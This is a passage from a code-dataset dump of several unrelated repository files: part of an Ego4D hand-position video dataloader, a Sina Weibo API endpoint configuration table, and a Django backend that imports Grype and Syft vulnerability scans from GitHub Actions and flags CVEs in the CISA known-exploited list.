self._path_to_ant_videos.append(path_to_image_frame)\r\n self._pre45_clip_frames.append(frame_dict[\"pre_45\"][\"clip_frame\"])\r\n self._pre45_frames.append(frame_dict[\"pre_45\"][\"frame\"])\r\n label = []\r\n label_mask = []\r\n # placeholder for the 1x20 hand gt vector (padd zero when GT is not available)\r\n # 5 frames have the following order: pre_45, pre_40, pre_15, pre, contact\r\n # GT for each frames has the following order: left_x,left_y,right_x,right_y\r\n label = [0.0] * 20\r\n label_mask = [0.0] * 20\r\n if self.mode in [\"train\", \"val\", \"trainval\"]:\r\n for frame_type, frame_annot in frame_dict.items():\r\n if frame_type in [\r\n \"action_start_sec\",\r\n \"action_end_sec\",\r\n \"action_start_frame\",\r\n \"action_end_frame\",\r\n \"action_clip_start_sec\",\r\n \"action_clip_end_sec\",\r\n \"action_clip_start_frame\",\r\n \"action_clip_end_frame\",\r\n ]:\r\n continue\r\n if frame_type == \"pre_45\":\r\n for single_hand in frame_annot[\"boxes\"]:\r\n if \"left_hand\" in single_hand:\r\n label_mask[0] = 1.0\r\n label_mask[1] = 1.0\r\n 
label[0] = single_hand[\"left_hand\"][0]\r\n label[1] = single_hand[\"left_hand\"][1]\r\n if \"right_hand\" in single_hand:\r\n label_mask[2] = 1.0\r\n label_mask[3] = 1.0\r\n label[2] = single_hand[\"right_hand\"][0]\r\n label[3] = single_hand[\"right_hand\"][1]\r\n if frame_type == \"pre_30\":\r\n for single_hand in frame_annot[\"boxes\"]:\r\n if \"left_hand\" in single_hand:\r\n label_mask[4] = 1.0\r\n label_mask[5] = 1.0\r\n label[4] = single_hand[\"left_hand\"][0]\r\n label[5] = single_hand[\"left_hand\"][1]\r\n if \"right_hand\" in single_hand:\r\n label_mask[6] = 1.0\r\n label_mask[7] = 1.0\r\n label[6] = single_hand[\"right_hand\"][0]\r\n label[7] = single_hand[\"right_hand\"][1]\r\n if frame_type == \"pre_15\":\r\n for single_hand in frame_annot[\"boxes\"]:\r\n if \"left_hand\" in single_hand:\r\n label_mask[8] = 1.0\r\n label_mask[9] = 1.0\r\n label[8] = single_hand[\"left_hand\"][0]\r\n label[9] = single_hand[\"left_hand\"][1]\r\n if \"right_hand\" in single_hand:\r\n label_mask[10] = 1.0\r\n label_mask[11] = 1.0\r\n label[10] = single_hand[\"right_hand\"][0]\r\n label[11] = single_hand[\"right_hand\"][1]\r\n if frame_type == \"pre_frame\":\r\n for single_hand in frame_annot[\"boxes\"]:\r\n if \"left_hand\" in single_hand:\r\n label_mask[12] = 1.0\r\n label_mask[13] = 1.0\r\n label[12] = single_hand[\"left_hand\"][0]\r\n label[13] = single_hand[\"left_hand\"][1]\r\n if \"right_hand\" in single_hand:\r\n label_mask[14] = 1.0\r\n label_mask[15] = 1.0\r\n label[14] = single_hand[\"right_hand\"][0]\r\n label[15] = single_hand[\"right_hand\"][1]\r\n if frame_type == \"contact_frame\":\r\n for single_hand in frame_annot[\"boxes\"]:\r\n if \"left_hand\" in single_hand:\r\n label_mask[16] = 1.0\r\n label_mask[17] = 1.0\r\n label[16] = single_hand[\"left_hand\"][0]\r\n label[17] = single_hand[\"left_hand\"][1]\r\n if \"right_hand\" in single_hand:\r\n label_mask[18] = 1.0\r\n label_mask[19] = 1.0\r\n label[18] = single_hand[\"right_hand\"][0]\r\n label[19] = single_hand[\"right_hand\"][1]\r\n self._labels.append(label)\r\n self._labels_masks.append(label_mask)\r\n logger.info(\r\n \"Constructing Ego4D dataloader (size: {})\".format(\r\n len(self._pre45_clip_frames)\r\n )\r\n )\r\n\r\n def __getitem__(self, index):\r\n \"\"\"\r\n Given the video index, return the list of frames, label, and video\r\n index if the video can be fetched and decoded successfully, otherwise\r\n repeatly find a random video that can be decoded as a replacement.\r\n Args:\r\n index (int): the video index provided by the pytorch sampler.\r\n Returns:\r\n frames (tensor): the frames of sampled from the video. The dimension\r\n is `channel` x `num frames` x `height` x `width`.\r\n label (int): the label of the current video.\r\n index (int): if the video provided by pytorch sampler can be\r\n decoded, then return the index of the video. 
If not, return the\r\n index of the video replacement that can be decoded.\r\n \"\"\"\r\n short_cycle_idx = None\r\n # When short cycle is used, input index is a tupple.\r\n if isinstance(index, tuple):\r\n index, short_cycle_idx = index\r\n\r\n if self.mode in [\"train\", \"val\", \"trainval\"]:\r\n # -1 indicates random sampling.\r\n spatial_sample_index = -1\r\n min_scale = self.cfg.DATA.TRAIN_JITTER_SCALES[0]\r\n max_scale = self.cfg.DATA.TRAIN_JITTER_SCALES[1]\r\n crop_size = self.cfg.DATA.TRAIN_CROP_SIZE\r\n if short_cycle_idx in [0, 1]:\r\n crop_size = int(\r\n round(\r\n self.cfg.MULTIGRID.SHORT_CYCLE_FACTORS[short_cycle_idx]\r\n * self.cfg.MULTIGRID.DEFAULT_S\r\n )\r\n )\r\n if self.cfg.MULTIGRID.DEFAULT_S > 0:\r\n # Decreasing the scale is equivalent to using a larger \"span\"\r\n # in a sampling grid.\r\n min_scale = int(\r\n round(float(min_scale) * crop_size / self.cfg.MULTIGRID.DEFAULT_S)\r\n )\r\n elif self.mode in [\"test\"]:\r\n min_scale, max_scale, crop_size = [self.cfg.DATA.TEST_CROP_SIZE] * 3\r\n # The testing is deterministic and no jitter should be performed.\r\n # min_scale, max_scale, and crop_size are expect to be the same.\r\n assert len({min_scale, max_scale, crop_size}) == 1\r\n else:\r\n raise NotImplementedError(\"Does not support {} mode\".format(self.mode))\r\n\r\n # create frame name list\r\n num_frames = self.cfg.DATA.NUM_FRAMES\r\n frame_names = list(\r\n reversed(\r\n [\r\n max(1, self._pre45_clip_frames[index] - 15 * i)\r\n for i in range(1, num_frames + 1)\r\n ]\r\n )\r\n )\r\n # load frames\r\n input_dir_rgb = self._path_to_ant_videos[index]\r\n input_dir_flow = Path(str(input_dir_rgb).replace(\"image_frame\", \"optical_flow\"))\r\n pre45_clip_frame = self._pre45_clip_frames[index]\r\n input_path_rgb = input_dir_rgb / Path(str(pre45_clip_frame).zfill(6))\r\n input_path_flow = (\r\n input_dir_flow / Path(\"npy\") / Path(str(pre45_clip_frame).zfill(6))\r\n )\r\n img = cv2.imread(str(input_path_rgb) + \".png\")\r\n h, w, _ = img.shape\r\n frames = torch.zeros(num_frames, 224, 224, 3)\r\n flows = torch.zeros(num_frames, 224, 224, 2)\r\n for i, frame in enumerate(frame_names):\r\n input_path_rgb = input_dir_rgb / Path(str(frame).zfill(6))\r\n input_path_flow = input_dir_flow / Path(\"npy\") / Path(str(frame).zfill(6))\r\n img = cv2.imread(str(input_path_rgb) + \".png\").astype(np.float32)\r\n frames[i] = torch.from_numpy(cv2.resize(img, (224, 224)))\r\n flows[i] = torch.from_numpy(\r\n np.load(str(input_path_flow) + \".npy\").astype(np.float32)\r\n )\r\n\r\n # Perform color normalization.\r\n frames = utils.tensor_normalize(frames, self.cfg.DATA.MEAN, self.cfg.DATA.STD)\r\n # T H W C -> C T H W.\r\n frames = frames.permute(3, 0, 1, 2)\r\n flows = flows.permute(3, 0, 1, 2)\r\n\r\n if self.mode in [\"train\", \"val\", \"trainval\"]:\r\n frames = utils.spatial_sampling(\r\n frames,\r\n spatial_idx=spatial_sample_index,\r\n min_scale=min_scale,\r\n max_scale=max_scale,\r\n crop_size=crop_size,\r\n random_horizontal_flip=self.cfg.DATA.RANDOM_FLIP,\r\n inverse_uniform_sampling=self.cfg.DATA.INV_UNIFORM_SAMPLE,\r\n )\r\n\r\n label = self._labels[index]\r\n label = torch.FloatTensor(label)\r\n mask = self._labels_masks[index]\r\n mask = torch.FloatTensor(mask)\r\n idx = (self._clip_idx[index], self._pre45_frames[index] - 1)\r\n meta = [str(input_dir_rgb), pre45_clip_frame, h, w, idx]\r\n if self.cfg.MODEL.TWO_STREAM:\r\n inputs = [frames, flows]\r\n elif self.cfg.MODEL.FLOW_ONLY:\r\n inputs = [flows]\r\n else:\r\n inputs = utils.pack_pathway_output(self.cfg, 
frames)\r\n\r\n return inputs, label, mask, index, meta\r\n\r\n def __len__(self):\r\n \"\"\"\r\n Returns:\r\n (int): the number of videos in the dataset.\r\n \"\"\"\r\n\r\n return len(self._path_to_ant_videos)\r\n","repo_name":"masashi-hatano/ego4d-fhp-challenge-2022","sub_path":"slowfast/datasets/ego4dhand.py","file_name":"ego4dhand.py","file_ext":"py","file_size_in_byte":14989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"28205038147","text":"# coding=utf8\n\n_PAGE_PAGE = {\n 'key': 'page',\n 'init': 1,\n 'incr': 1,\n}\n\n\n_PAGE_CURSOR = {\n 'key': 'cursor',\n 'init': 0,\n 'incr': 'next_cursor',\n}\n\n\nAPI_INFOS = {\n 'statuses__public_timeline': {\n 'default': {'count': 200},\n 'payload': 'statuses',\n }, #获取最新的公共微博 DONE\n 'statuses__friends_timeline': {}, #获取当前登录用户及其所关注用户的最新微博\n 'statuses__home_timeline': {}, #获取当前登录用户及其所关注用户的最新微博\n 'statuses__friends_timeline__ids': {}, #获取当前登录用户及其所关注用户的最新微博的ID\n 'statuses__user_timeline':\n { 'default':\n { 'count': 200 },\n 'payload': 'statuses',\n 'page': _PAGE_PAGE,\n }, #获取用户发布的微博 DONE\n 'statuses__user_timeline__ids': {}, #获取用户发布的微博的ID\n 'statuses__repost_timeline':\n { 'default':\n { 'count': 200, },\n 'payload': 'reposts',\n 'page': _PAGE_PAGE,\n }, #返回一条原创微博的最新转发微博 DONE\n 'statuses__repost_timeline__ids': {}, #获取一条原创微博的最新转发微博的ID\n 'statuses__repost_by_me': {}, #返回用户转发的最新微博\n 'statuses__mentions':\n { 'default':\n { 'count': 200 },\n 'payload': 'statuses',\n 'page': _PAGE_PAGE,\n }, #获取@当前用户的最新微博 DONE\n 'statuses__mentions__ids': {}, #获取@当前用户的最新微博的ID\n 'statuses__bilateral_timeline': {}, #获取双向关注用户的最新微博\n 'statuses__show':\n { 'payload_type': 'dict',\n }, #根据ID获取单条微博信息 DONE\n 'statuses__querymid': {}, #通过id获取mid\n 'statuses__queryid': {}, #通过mid获取id\n 'statuses__hot__repost_daily': {}, #按天返回热门转发榜\n 'statuses__hot__repost_weekly': {}, #按周返回热门转发榜\n 'statuses__hot__comments_daily': {}, #按天返回当前用户关注人的热门微博评论榜\n 'statuses__hot__comments_weekly': {}, #按周返回热门评论榜\n 'statuses__count':\n { 'payload_type': 'dict',\n }, #批量获取指定微博的转发数评论数 DONE\n 'statuses__show_batch':\n { 'payload': 'statues',\n }, #Undocumented API DONE\n 'emotions': {}, #获取官方表情\n 'statuses__repost': {}, #转发一条微博信息\n 'statuses__destroy': {}, #删除微博信息\n 'statuses__update': {}, #发布一条微博信息\n 'statuses__upload': {}, #上传图片并发布一条微博\n 'statuses__upload_url_text': {}, #发布一条微博同时指定上传的图片或图片url\n 'comments__show':\n { 'default':\n { 'count': 50, },\n 'payload': 'comments',\n 'page': _PAGE_PAGE,\n }, #获取某条微博的评论列表 DONE\n 'comments__by_me':\n { 'default':\n { 'count': 200 },\n 'payload': 'comments',\n 'page': _PAGE_PAGE,\n }, #我发出的评论列表 DONE\n 'comments__to_me':\n { 'default':\n { 'count': 200 },\n 'payload': 'comments',\n 'page': _PAGE_PAGE,\n }, #我收到的评论列表 DONE\n 'comments__timeline': {}, #获取用户发送及收到的评论列表\n 'comments__mentions': {}, #获取@到我的评论\n 'comments__show_batch': {}, #批量获取评论内容 DONE\n 'comments__create': {}, #评论一条微博\n 'comments__destroy': {}, #删除一条评论\n 'comments__destroy_batch': {}, #批量删除评论\n 'comments__reply': {}, #回复一条评论\n 'users__show':\n { 'payload_type': 'dict',\n }, #获取用户信息 DONE\n 'users__domain_show': {}, #通过个性域名获取用户信息\n 'users__counts': {}, #批量获取用户的粉丝数、关注数、微博数 DONE\n 'friendships__friends': {}, #获取用户的关注列表\n 'friendships__friends__in_common': {}, #获取共同关注人列表\n 'friendships__friends__bilateral': {}, #获取双向关注列表\n 'friendships__friends__bilateral__ids': {}, #获取双向关注UID列表\n 'friendships__friends__ids':\n { 'default':\n { 'count': 5000},\n 'payload': 'ids',\n 'page': _PAGE_CURSOR,\n }, #获取用户关注对象UID列表\n 'friendships__followers':\n { 
'default':\n { 'count': 200 },\n 'payload': 'users',\n 'page': _PAGE_CURSOR,\n }, #获取用户粉丝列表 DONE\n 'friendships__followers__ids':\n { 'default':\n {'count': 5000},\n 'payload': 'ids',\n 'page': _PAGE_CURSOR,\n }, #获取用户粉丝UID列表 DONE\n 'friendships__followers__active': {}, #获取用户优质粉丝列表\n 'friendships__friends_chain__followers': {}, #获取我的关注人中关注了指定用户的人\n 'friendships__show':\n { 'payload_type': 'dict',\n }, #获取两个用户关系的详细情况 DONE\n 'friendships__create': {}, #关注某用户\n 'friendships__destroy': {}, #取消关注某用户\n 'friendships__remark__update': {}, #更新关注人备注\n 'account__get_privacy': {}, #获取隐私设置信息\n 'account__profile__school_list': {}, #获取所有学校列表\n 'account__rate_limit_status': {}, #获取当前用户API访问频率限制\n 'account__get_uid': {}, #OAuth授权之后获取用户UID(作用相当于旧版接口的 account__verify_credentials)\n 'account__end_session': {}, #退出登录\n 'favorites': {}, #获取当前用户的收藏列表\n 'favorites__ids': {}, #获取当前用户的收藏列表的ID\n 'favorites__show': {}, #获取单条收藏信息\n 'favorites__by_tags': {}, #获取当前用户某个标签下的收藏列表\n 'favorites__tags': {}, #当前登录用户的收藏标签列表\n 'favorites__by_tags__ids': {}, #获取当前用户某个标签下的收藏列表的ID\n 'favorites__create': {}, #添加收藏\n 'favorites__destroy': {}, #删除收藏\n 'favorites__destroy_batch': {}, #批量删除收藏\n 'favorites__tags__update': {}, #更新收藏标签\n 'favorites__tags__update_batch': {}, #更新当前用户所有收藏下的指定标签\n 'favorites__tags__destroy_batch': {}, #删除当前用户所有收藏下的指定标签\n 'trends': {}, #获取某人话题\n 'trends__status':\n { 'default' :\n { 'count': 10, },\n 'payload': 'statuses',\n 'page': _PAGE_PAGE,\n }, # Used by wubin. have no offical document. DONE\n 'trends__is_follow': {}, #是否关注某话题\n 'trends__hourly': {}, #返回最近一小时内的热门话题\n 'trends__daily': {}, #返回最近一天内的热门话题\n 'trends__weekly': {}, #返回最近一周内的热门话题\n 'trends__follow': {}, #关注某话题\n 'trends__destroy': {}, #取消关注的某一个话题\n 'tags':\n { 'default':\n { 'count': 20, },\n 'page': _PAGE_PAGE,\n }, #返回指定用户的标签列表 DONE\n 'tags__tags_batch': {}, #批量获取用户标签\n 'tags__suggestions': {}, #返回系统推荐的标签列表\n 'tags__create': {}, #添加用户标签\n 'tags__destroy': {}, #删除用户标签\n 'tags__destroy_batch': {}, #批量删除用户标签\n 'register__verify_nickname': {}, #验证昵称是否可用\n 'search__suggestions__users': {}, #搜用户搜索建议\n 'search__suggestions__statuses': {}, #搜微博搜索建议\n 'search__suggestions__schools': {}, #搜学校搜索建议\n 'search__suggestions__companies': {}, #搜公司搜索建议\n 'search__suggestions__apps': {}, #搜应用搜索建议\n 'search__suggestions__at_users': {}, #@联想搜索\n 'search__topics':\n { 'default':\n {'count':200, },\n 'payload': 'statuses',\n 'page': _PAGE_PAGE,\n }, #搜索某一话题下的微博 DONE\n 'suggestions__users__hot': {}, #获取系统推荐用户\n 'suggestions__users__may_interested': {}, #获取用户可能感兴趣的人\n 'suggestions__users__by_status': {}, #根据微博内容推荐用户\n 'suggestions__statuses__hot': {}, #获取微博精选推荐\n 'suggestions__statuses__reorder': {}, #主Feed微博按兴趣推荐排序\n 'suggestions__statuses__reorder__ids': {}, #主Feed微博按兴趣推荐排序的微博ID\n 'suggestions__favorites__hot': {}, #热门收藏\n 'suggestions__users__not_interested': {}, #不感兴趣的人\n 'remind__unread_count': {}, #获取某个用户的各种消息未读数\n 'remind__set_count': {}, #对当前登录用户某一种消息未读数进行清零\n 'short_url__shorten':\n { 'payload': 'urls',\n }, #长链转短链 DONE\n 'short_url__expand': {}, #短链转长链\n 'short_url__clicks': {}, #获取短链接的总点击数\n 'short_url__referers': {}, #获取一个短链接点击的referer来源和数量\n 'short_url__locations': {}, #获取一个短链接点击的地区来源和数量\n 'short_url__share__counts': {}, #获取短链接在微博上的微博分享数\n 'short_url__share__statuses':\n { 'default':\n { 'count': 200, },\n 'payload': 'share_statuses',\n 'page': _PAGE_PAGE,\n }, #获取包含指定单个短链接的最新微博内容 DONE\n 'short_url__comment__counts': {}, #获取短链接在微博上的微博评论数\n 'short_url__comment__comments': {}, #获取包含指定单个短链接的最新微博评论\n 'short_url__info': {}, #批量获取短链接的富内容信息\n 'notification__send': 
{}, #给一个或多个用户发送一条新的状态通知\n 'common__code_to_location': {}, #通过地址编码获取地址名称\n 'common__get_city': {}, #获取城市列表\n 'common__get_province': {}, #获取省份列表\n 'common__get_country': {}, #获取国家列表\n 'common__get_timezone': {}, #获取时区配置表\n 'place__public_timeline': {}, #获取公共的位置动态\n 'place__friends_timeline': {}, #获取用户好友的位置动态\n 'place__user_timeline': {}, #获取某个用户的位置动态\n 'place__poi_timeline': {}, #获取某个位置地点的动态\n 'place__nearby_timeline': {}, #获取某个位置周边的动态\n 'place__statuses__show': {}, #获取动态的详情\n 'place__users__show': {}, #获取LBS位置服务内的用户信息\n 'place__users__checkins': {}, #获取用户签到过的地点列表\n 'place__users__photos': {}, #获取用户的照片列表\n 'place__users__tips': {}, #获取用户的点评列表\n 'place__users__todos': {}, #获取用户的todo列表\n 'place__pois__show': {}, #获取地点详情\n 'place__pois__users': {}, #获取在某个地点签到的人的列表\n 'place__pois__tips': {}, #获取地点点评列表\n 'place__pois__photos': {}, #获取地点照片列表\n 'place__pois__search': {}, #按省市查询地点\n 'place__pois__category': {}, #获取地点分类\n 'place__nearby__pois': {}, #获取附近地点\n 'place__nearby__users': {}, #获取附近发位置微博的人\n 'place__nearby__photos': {}, #获取附近照片\n 'place__nearby_users__list': {}, #获取附近的人\n 'place__pois__create': {}, #添加地点\n 'place__pois__add_checkin': {}, #签到\n 'place__pois__add_photo': {}, #添加照片\n 'place__pois__add_tip': {}, #添加点评\n 'place__pois__add_todo': {}, #添加todo\n 'place__nearby_users__create': {}, #用户添加自己的位置\n 'place__nearby_users__destroy': {}, #用户删除自己的位置\n 'location__base__get_map_image': {}, #生成一张静态的地图图片\n 'location__geo__ip_to_geo': {}, #根据IP地址返回地理信息坐标\n 'location__geo__address_to_geo': {}, #根据实际地址返回地理信息坐标\n 'location__geo__geo_to_address': {}, #根据地理信息坐标返回实际地址\n 'location__geo__gps_to_offset': {}, #根据GPS坐标获取偏移后的坐标\n 'location__geo__is_domestic': {}, #判断地理信息坐标是否是国内坐标\n 'location__pois__show_batch': {}, #批量获取POI点的信息\n 'location__pois__search__by_location': {}, #根据关键词按地址位置获取POI点的信息\n 'location__pois__search__by_geo': {}, #根据关键词按坐标点范围获取POI点的信息\n 'location__pois__search__by_area': {}, #根据关键词按矩形区域获取POI点的信息\n 'location__pois__add': {}, #提交一个新增的POI点信息\n 'location__mobile__get_location': {}, #根据移动基站WIFI等数据获取当前位置信息\n 'location__line__drive_route': {}, #根据起点与终点数据查询自驾车路线信息\n 'location__line__bus_route': {}, #根据起点与终点数据查询公交乘坐路线信息\n 'location__line__bus_line': {}, #根据关键词查询公交线路信息\n 'location__line__bus_station': {}, #根据关键词查询公交站点信息\n 'location__citycode': {}, #城市代码对应表\n 'location__citycode_bus': {}, #公交城市代码表\n 'location__category': {}, #分类代码对应表\n 'location__error2': {}, #地理位置信息接口错误代码及解释\n 'oauth2__authorize': {}, #请求用户授权Token\n 'oauth2__access_token': {}, #获取授权过的Access Token\n 'oauth2__get_oauth2_token': {}, #OAuth1.0的Access Token更换至OAuth2.0的Access Token\n }\n","repo_name":"seraphlnWu/observer","sub_path":"observer/platform/sina/weibo/apiv2/apiinfo.py","file_name":"apiinfo.py","file_ext":"py","file_size_in_byte":13499,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"33"} +{"seq_id":"8983134555","text":"from requests import delete\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nimport sys\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.db import transaction\n\nimport json\nfrom datetime import datetime, timedelta\nimport requests\n\nfrom vuln_backend.models import *\nfrom django.http import HttpResponse, HttpResponseBadRequest\nimport requests\nimport os\nimport zipfile\nimport shutil\nfrom threading import Thread\nimport time\n\ndef validate_request(request, headers):\n # get json\n try:\n json_data = json.loads(request.body)\n except ValueError as e:\n print(e)\n return 
HttpResponseBadRequest(\"Invalid JSON\")\n \n # check if repo_org and repo_name are in the json\n if 'repo_org' not in json_data:\n return HttpResponseBadRequest('No repo_org in request')\n if 'repo_name' not in json_data:\n return HttpResponseBadRequest('No repo_name in request')\n\n # get repo url\n repo_org = json_data['repo_org']\n repo_name = json_data['repo_name']\n\n orgs = os.environ['GITHUB_ACCS'].lower()\n\n # contains comma separated orgs\n orgs = orgs.split(',')\n\n # check if owner is correct\n if repo_org.lower() not in orgs:\n return HttpResponseBadRequest(\"Org not in scope\")\n \n # get repos from owner\n r = requests.get('https://api.github.com/' + str(os.environ['USERS_OR_ORGS']).lower() + '/' + repo_org.lower() + '/repos', headers=headers)\n x = 'https://api.github.com/' + str(os.environ['USERS_OR_ORGS']).lower() + '/' + repo_org.lower() + '/repos'\n print(x)\n repos = r.json()\n\n # check if this repo is in the list\n in_scope = False\n for repo in repos:\n if repo['name'] == repo_name:\n in_scope = True\n break\n \n if not in_scope:\n return HttpResponseBadRequest(\"Repo not in scope\")\n \n return None, repo_org, repo_name, json_data\n\n@csrf_exempt\ndef repo_notification(request, already_called=False, repo_org=None, repo_name=None, json_data=None):\n if request.method == 'POST':\n headers={\n 'Accept': 'application/vnd.github.v3+json',\n 'Authorization': 'token ' + os.environ['GITHUB_PAT'],\n }\n ### Validate the request\n if already_called:\n time.sleep(30)\n else:\n error, repo_org, repo_name, json_data = validate_request(request, headers)\n if error:\n return error\n\n ### Get the data\n print(\"Got job for \" + repo_org + \"/\" + repo_name)\n # get jobs from repo\n r = requests.get('https://api.github.com/repos/' + repo_org + '/' + repo_name + '/actions/artifacts', headers=headers)\n artifacts = r.json()\n with open('artifacts.json', 'w') as f:\n json.dump(artifacts, f, indent=4)\n output = []\n for artifact in artifacts['artifacts']:\n # print keys in artifact\n if artifact['name'] == 'scan':\n workflow_id = artifact['workflow_run']['id']\n # check if this job is already in the database using the\n if ScanData.objects.filter(workflow_id=workflow_id).exists():\n message = {\n \"status\": \"ok\",\n \"message\": \"scan already exists\"\n } \n else:\n print(\"new scan discovered\")\n # download the scan\n r = requests.get(artifact['archive_download_url'], headers=headers)\n # save the scan temporarily\n with open('/tmp/' + str(workflow_id) + '.zip', 'wb') as f:\n f.write(r.content)\n # unzip the scan\n with zipfile.ZipFile('/tmp/' + str(workflow_id) + '.zip', 'r') as zip_ref:\n zip_ref.extractall('/tmp/' + str(workflow_id))\n \n # call create_db_entries\n with open('/tmp/' + str(workflow_id) + '/vuln.json', 'r') as f:\n grype_file = f.read()\n with open('/tmp/' + str(workflow_id) + '/sbom.json', 'r') as f:\n syft_file = f.read()\n\n message = create_db_entries(grype_file, syft_file, json_data, workflow_id, artifact['created_at'])\n \n # delete the scan\n shutil.rmtree('/tmp/' + str(workflow_id))\n os.remove('/tmp/' + str(workflow_id) + '.zip')\n message['workflow_id'] = workflow_id\n output.append(message)\n # return json with indent\n if not already_called:\n # start repo_notification again as thread\n thread = Thread(target=repo_notification, args=(request, True, repo_org, repo_name, json_data))\n thread.start()\n return HttpResponse(json.dumps(output, indent=4), content_type='application/json')\n else:\n # return invalid method\n return 
HttpResponseBadRequest(\"Invalid method\")\n\n@transaction.atomic\ndef create_db_entries(grype_file, syft_file, metadata_json, workflow_id, created_at):\n try:\n # read the files and parse to json\n grype_json = json.loads(grype_file)\n syft_json = json.loads(syft_file)\n\n except Exception as e:\n print(e)\n return {\"status\": \"error\", \"message\": \"Error parsing the files\"}\n\n\n # get or create the repository entry\n repository = parse_repo_content(metadata_json)\n\n # add scan data to the database\n # --> get the timestamp of the scan\n \n scan_entry = ScanData.objects.create(\n created_at=created_at,\n repository=repository,\n workflow_id=workflow_id,\n grype_scan=grype_json,\n syft_scan=syft_json\n )\n\n # add artifacts and vulnerabilities\n artifact_stats, created_artifacts = parse_syft_scan(syft_json, scan_entry)\n vuln_stats = parse_grype_scan(grype_json, scan_entry, created_artifacts)\n\n # add an entry to the statistics table\n Statistics.objects.create(\n scan=scan_entry,\n number_dependencies=len(artifact_stats['artifacts']),\n number_vulnerabilities=len(vuln_stats['vulnerabilities']),\n number_vuln_critical=vuln_stats['Critical'],\n number_vuln_high=vuln_stats['High'],\n number_vuln_medium=vuln_stats['Medium'],\n number_vuln_low=vuln_stats['Low'],\n number_vuln_negligible=vuln_stats['Negligible'],\n number_vuln_unknown=vuln_stats['Unknown']\n )\n\n # check if there are known exploited vulnerabilities in the scan\n exploited_vulns = get_known_exploited_vulns()\n print(\"The following vulnerabilities have been identified as currently being exploited: \" + str(exploited_vulns))\n \n return {\"status\": \"ok\"}\n\ndef parse_syft_scan(syft_json, scan_entry):\n artifact_stats = {\n 'artifacts': []\n }\n created_artifacts = []\n for artifact in syft_json['artifacts']:\n # update or create the artifact entry\n new_artifact, created = Artifacts.objects.get_or_create(\n name=artifact['name'],\n version=artifact['version'],\n purl=artifact['purl'],\n type=artifact['type'],\n cpes=artifact['cpes'],\n licenses=artifact['licenses']\n )\n\n # add artifact to scan\n new_artifact.scan.add(scan_entry)\n\n # add artifact to stats\n if (artifact['name'], artifact['version']) not in artifact_stats['artifacts']:\n artifact_stats['artifacts'].append((artifact['name'], artifact['version']))\n created_artifacts.append(new_artifact)\n\n return artifact_stats, created_artifacts\n\ndef parse_grype_scan(grype_json, scan_entry, created_artifacts):\n vuln_stats = {\n 'vulnerabilities': [],\n 'Critical': 0, 'High': 0, 'Medium': 0, 'Low': 0, 'Negligible': 0, 'Unknown': 0\n }\n for match in grype_json['matches']:\n vulnerability = match['vulnerability']\n\n # get all entries that have cvss informations\n cvss_vulns = []\n if 'cvss' in vulnerability and vulnerability['cvss'] != []:\n cvss_vulns.append(vulnerability)\n for related_vuln in match['relatedVulnerabilities']:\n if 'cvss' in related_vuln and related_vuln['cvss'] != []:\n cvss_vulns.append(related_vuln)\n \n # if we have at least one cvss entry: \n if len(cvss_vulns) != 0:\n # try to find the nvd entry in the cvss entries\n for vuln in cvss_vulns:\n if 'nvd' in vuln['namespace']:\n vulnerability = vuln\n break\n else:\n # if we don't have any cvss entry, take try to find the nvd entry\n if 'nvd' not in vulnerability['namespace']:\n for related_vuln in match['relatedVulnerabilities']:\n if 'nvd' in related_vuln['namespace']:\n vulnerability = related_vuln\n break\n \n # try to find the artifact entry in the already created artifacts\n artifact = 
None\n for created_artifact in created_artifacts:\n if created_artifact.name == match['artifact']['name'] and created_artifact.version == match['artifact']['version']:\n artifact = created_artifact\n break\n\n # because we want a version history, we have to create a new vulnerability entry\n # only reuse the vulnerability if everything is the same\n vuln, created = Vulnerabilities.objects.get_or_create(\n vuln_id=vulnerability['id'],\n severity=vulnerability['severity'],\n cvss=vulnerability['cvss'],\n fix=match['vulnerability']['fix'],\n description=vulnerability['description'] if 'description' in vulnerability else None,\n url=vulnerability['dataSource'] if 'dataSource' in vulnerability else None,\n )\n\n # add scan and artifact entry to the vulnerability\n vuln.scan.add(scan_entry)\n vuln.artifact.add(artifact)\n\n # add vuln to stats \n if vulnerability['id'] not in vuln_stats['vulnerabilities']:\n vuln_stats['vulnerabilities'].append(vulnerability['id'])\n try:\n vuln_stats[vulnerability['severity']] += 1\n except KeyError:\n vuln_stats['Unknown'] += 1\n\n return vuln_stats\n\ndef parse_repo_content(metadata_json):\n try:\n repository, created = Repositories.objects.get_or_create(\n url=metadata_json['repo_url'],\n defaults={'organization': metadata_json['repo_org'], 'name': metadata_json['repo_name']}\n )\n except Exception as e:\n print(e)\n return {\"status\": \"error\", \"message\": \"Error parsing the repository data\"}\n print('created new Repository: ', created)\n return repository\n\n\ndef find_best_version(grype_json):\n # extract all vulnerabilities with a known fix\n fixed_vulns = {}\n for match in grype_json['matches']:\n fix=match['vulnerability']['fix']\n if fix[\"state\"] == \"fixed\":\n fixed_vulns[match['vulnerability']['id']]['versions'] = fix[\"versions\"]\n fixed_vulns[match['vulnerability']['id']]['purl'] = match['artifact']['purl']\n pass\n\ndef get_known_exploited_vulns():\n\n # Retrieve known exploited vulnerabilities from cisa.gov\n response = requests.get(\"https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json\")\n json_response = response.json()\n vulns = json_response.get('vulnerabilities')\n\n week_delta = timedelta(weeks=12)\n now = datetime.now()\n\n exploited_vulns = []\n for vuln in vulns:\n dueDate = datetime.strptime(vuln.get('dueDate'), '%Y-%m-%d')\n\n # check if vuln is in given timeframe\n if now <= dueDate + week_delta:\n try:\n cve_id = vuln.get('cveId')\n vuln_entry = Vulnerabilities.objects.get(vuln_id=cve_id)\n vuln_entry.actively_exploited = True\n vuln_entry.save()\n exploited_vulns.append(cve_id)\n print(cve_id, 'is actively exploited')\n\n except Vulnerabilities.DoesNotExist:\n pass\n \n return exploited_vulns\n","repo_name":"Root-DE/Applied-Cybersecurity-Django","sub_path":"src/applied_cybersec/vuln_api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12343,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"33"} +{"seq_id":"20768979685","text":"from __future__ import \\\n annotations # allows us to use ClusterNode in type hints, which will be default in Python 3.10\n\nfrom dataclasses import dataclass, field\nfrom math import inf\n\nimport numpy as np\n\nimport algorithms.kmedplusplus\nfrom solver_interface import Instance, ExplainableOutput, ClusterNode, 